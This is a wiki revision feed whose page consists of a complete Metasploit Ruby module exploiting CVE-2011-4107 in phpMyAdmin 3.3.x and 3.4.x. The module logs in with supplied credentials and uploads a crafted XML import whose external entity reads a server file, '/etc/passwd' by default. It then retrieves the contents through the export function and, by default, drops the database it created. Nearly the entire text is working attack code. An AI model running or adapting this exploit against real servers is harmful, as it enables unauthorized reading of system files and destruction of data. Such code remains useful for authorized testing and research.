https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2011-4107_phpMyAdmin_XXE%E6%BC%8F%E6%B4%9E
CVE-2011-4107 phpMyAdmin XXE漏洞 - Revision history
2026-04-07T23:28:43Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2011-4107_phpMyAdmin_XXE%E6%BC%8F%E6%B4%9E&diff=962&oldid=prev
Pwnwiki: Created page with "==POC== <pre> ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit #..."
2021-04-03T06:37:36Z
<p>Created page with "==POC== <pre> ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit #..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
##<br />
# $Id$<br />
##<br />
<br />
##<br />
# This file is part of the Metasploit Framework and may be subject to<br />
# redistribution and commercial restrictions. Please see the Metasploit<br />
# Framework web site for more information on licensing and terms of use.<br />
# http://metasploit.com/framework/<br />
##<br />
<br />
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Auxiliary<br />
<br />
include Msf::Exploit::Remote::HttpClient<br />
<br />
def initialize<br />
super(<br />
'Name' => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion',<br />
'Version' => '1.0',<br />
'Description' => %q{CVE-2011-4107 PoC - Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).<br />
The attacker must be logged in to MySQL via phpMyAdmin.<br />
Works on Windows and Linux Versions 3.3.X and 3.4.X},<br />
'References' =><br />
[<br />
[ 'CVE', '2011-4107' ],<br />
[ 'OSVDB', '76798' ],<br />
[ 'BID', '50497' ],<br />
[ 'URL', 'http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection'],<br />
],<br />
'Author' => [ 'Marco Batista' ],<br />
'License' => MSF_LICENSE<br />
)<br />
<br />
register_options(<br />
[<br />
Opt::RPORT(80),<br />
OptString.new('FILE', [ true, "File to read", '/etc/passwd']),<br />
OptString.new('USER', [ true, "Username", 'root']),<br />
OptString.new('PASS', [ false, "Password", 'password']),<br />
OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),<br />
OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),<br />
OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),<br />
OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),<br />
],self.class)<br />
end<br />
<br />
def loginprocess<br />
# HTTP GET TO GET SESSION VALUES<br />
getresponse = send_request_cgi({<br />
'uri' => datastore['APP']+'/index.php',<br />
'method' => 'GET',<br />
'version' => '1.1',<br />
}, 25)<br />
<br />
if (getresponse.nil?)<br />
print_error("no response for #{ip}:#{rport}")<br />
elsif (getresponse.code == 200)<br />
print_status("Received #{getresponse.code} from #{rhost}:#{rport}")<br />
elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)<br />
print_status("Received 302 to #{getresponse.headers['Location']}")<br />
else<br />
print_error("Received #{getresponse.code} from #{rhost}:#{rport}")<br />
end<br />
<br />
valuesget = getresponse.headers["Set-Cookie"]<br />
varsget = valuesget.split(" ")<br />
<br />
#GETTING THE VARIABLES NEEDED<br />
phpMyAdmin = varsget.grep(/phpMyAdmin/).last<br />
pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last<br />
# END HTTP GET <br />
<br />
# LOGIN POST REQUEST TO GET COOKIE VALUE<br />
postresponse = send_request_cgi({<br />
'uri' => datastore['APP']+'/index.php',<br />
'method' => 'POST',<br />
'version' => '1.1',<br />
'headers' =>{<br />
'Content-Type' => 'application/x-www-form-urlencoded',<br />
'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"<br />
},<br />
'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'<br />
}, 25) <br />
<br />
if (postresponse["Location"].nil?)<br />
print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")<br />
tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last <br />
else<br />
tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last<br />
end<br />
<br />
<br />
valuespost = postresponse.headers["Set-Cookie"]<br />
varspost = valuespost.split(" ")<br />
<br />
#GETTING THE VARIABLES NEEDED<br />
pmaUser = varspost.grep(/pmaUser-1/).last<br />
pmaPass = varspost.grep(/pmaPass-1/).last<br />
<br />
return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue<br />
# END OF LOGIN POST REQUEST<br />
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e<br />
print_error(e.message)<br />
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e<br />
print_error(e.message)<br />
end<br />
<br />
def readfile(cookie,tokenvalue)<br />
#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN<br />
getfiles = send_request_cgi({<br />
'uri' => datastore['APP']+'/export.php',<br />
'method' => 'POST',<br />
'version' => '1.1',<br />
'headers' =>{<br />
'Cookie' => cookie<br />
},<br />
'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'<br />
}, 25)<br />
<br />
if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)<br />
print_error("Error reading the file... not enough privilege? login error?") <br />
else<br />
print_status("#{getfiles.body}")<br />
end<br />
end<br />
<br />
<br />
def dropdatabase(cookie,tokenvalue)<br />
dropdb = send_request_cgi({<br />
'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',<br />
'method' => 'GET',<br />
'version' => '1.1',<br />
'headers' =>{<br />
'Cookie' => cookie<br />
},<br />
}, 25)<br />
<br />
print_status("Dropping database: "+datastore['DB'])<br />
end<br />
<br />
def run<br />
cookie,tokenvalue = loginprocess()<br />
<br />
print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}") <br />
<br />
craftedXML = "------WebKitFormBoundary3XPL01T\n"<br />
craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"<br />
craftedXML << tokenvalue+"\n"<br />
craftedXML << "------WebKitFormBoundary3XPL01T\n"<br />
craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"<br />
craftedXML << "server\n"<br />
craftedXML << "------WebKitFormBoundary3XPL01T\n"<br />
craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"<br />
craftedXML << "Content-Type: text/xml\n\n"<br />
craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"<br />
craftedXML << "<!DOCTYPE ficheiro [ \n"<br />
craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" > ]>\n"<br />
craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"<br />
craftedXML << " <pma:structure_schemas>\n"<br />
craftedXML << " <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"<br />
craftedXML << " <pma:table name=\""+datastore['TBL']+"\">\n"<br />
craftedXML << " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"<br />
craftedXML << " </pma:table>\n"<br />
craftedXML << " </pma:database>\n"<br />
craftedXML << " </pma:structure_schemas>\n"<br />
craftedXML << " <database name=\""+datastore['DB']+"\">\n"<br />
craftedXML << " <table name=\""+datastore['TBL']+"\">\n"<br />
craftedXML << " <column name=\"file\">&conteudo;</column>\n"<br />
craftedXML << " </table>\n"<br />
craftedXML << " </database>\n"<br />
craftedXML << "</pma_xml_export>\n\n"<br />
craftedXML << "------WebKitFormBoundary3XPL01T\n"<br />
craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"<br />
craftedXML << "xml\n"<br />
craftedXML << "------WebKitFormBoundary3XPL01T\n"<br />
craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"<br />
craftedXML << ",\n\n"<br />
craftedXML << "------WebKitFormBoundary3XPL01T--"<br />
<br />
<br />
print_status("Grabbing that #{datastore['FILE']} you want...")<br />
res = send_request_cgi({<br />
'uri' => datastore['APP']+'/import.php',<br />
'method' => 'POST',<br />
'version' => '1.1',<br />
'headers' =>{<br />
'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',<br />
'Cookie' => cookie<br />
},<br />
'data' => craftedXML<br />
}, 25)<br />
<br />
readfile(cookie,tokenvalue)<br />
<br />
if (datastore['DROP'] == "true")<br />
dropdatabase(cookie,tokenvalue)<br />
else<br />
print_status("Database was not dropped: "+datastore['DB']) <br />
end<br />
<br />
end<br />
end<br />
<br />
<br />
</pre></div>
Pwnwiki